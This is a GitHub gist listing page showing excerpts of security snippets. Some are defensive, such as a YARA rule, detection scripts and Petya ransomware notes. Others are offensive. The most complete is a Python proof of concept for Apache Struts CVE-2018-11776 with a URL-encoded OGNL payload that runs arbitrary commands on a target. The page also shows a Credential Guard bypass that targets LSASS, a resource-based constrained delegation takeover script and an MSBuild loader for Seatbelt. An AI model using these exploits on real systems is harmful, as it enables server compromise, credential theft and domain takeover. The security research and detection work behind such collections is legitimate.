Skip to content

Instantly share code, notes, and snippets.

View binaryAccess's full-sized avatar

binaryAccess

14 followers · 25 following
View GitHub Profile
@N4kedTurtle
N4kedTurtle / CredGuard_PoC
Created August 25, 2020 14:17
PoC for enabling wdigest to bypass credential guard
#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <iostream>
DWORD GetLsassPid() {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
@Neo23x0
Neo23x0 / iddqd.yar
Last active August 1, 2024 09:08
IDDQD - Godmode YARA Rule
/*
WARNING:
the newest version of this rule is now hosted here:
https://github.com/Neo23x0/god-mode-rules/blob/master/godmode.yar
*/
/*
_____ __ __ ___ __
@HarmJ0y
HarmJ0y / rbcd_demo.ps1
Last active November 3, 2025 20:14
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
@curi0usJack
curi0usJack / msbuild_ghostpack_seatbelt.txt
Created October 25, 2018 10:21
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="NotSubTee">
<BusinessTime />
</Target>
<UsingTask
TaskName="BusinessTime"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
@atucom
atucom / CVE-2018-11776-PoC.py
Last active July 16, 2019 01:46
Simple PoC for the Apache Struts vuln CVE-2018-11776
import requests
# Simple PoC for the Apache Struts vuln CVE-2018-11776
# this currently works on the struts showcase app but can easily be adapted to anything
# Thanks to https://github.com/jas502n/St2-057 for working OGNL statements :D (proper URL encoding REALLY matters)
# @atucom
def runCMD(command):
target = 'http://192.168.235.181:8080/struts3-showcase/'
payload = '%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27' + command + '%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action'
return requests.get(target + payload).text
@dezhub
dezhub / Get-Doppelgangers.ps1
Created December 21, 2017 21:08
function Get-Doppelgangers
{
<#
.SYNOPSIS
Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'
Author: Joe Desimone (@dez_)
License: BSD 3-Clause
@dezhub
dezhub / Get-ClrReflection.ps1
Last active July 23, 2025 21:37
function Get-ClrReflection
{
<#
.SYNOPSIS
Detects memory-only CLR (.NET) modules
Author: Joe Desimone (@dez_)
License: BSD 3-Clause
@vulnersCom
vulnersCom / Petya_ransomware.md
Last active October 23, 2025 16:09

#petya #petrWrap #notPetya

Win32/Diskcoder.Petya.C

Ransomware attack.

About

This gist was built by the community of the researchers and was scribed by Kir and Igor from the QIWI/Vulners. We are grateful for the help of all those who sent us the data, links and information. Together we can make this world a better place!

Gist updates

@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active March 19, 2026 10:12
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@Neo23x0
Neo23x0 / nmap-cmdline
Last active March 19, 2020 17:10
Nmap Scan Params for CVE-2017-0143 MS17-010 Scanning
# Scan for CVE-2017-0143 MS17-010
# The vulnerability used by WannaCry Ransomware
#
# 1. Use @calderpwn's script
# http://seclists.org/nmap-dev/2017/q2/79
#
# 2. Save it to Nmap NSE script directory
# Linux - /usr/share/nmap/scripts/ or /usr/local/share/nmap/scripts/
# OSX - /opt/local/share/nmap/scripts/
#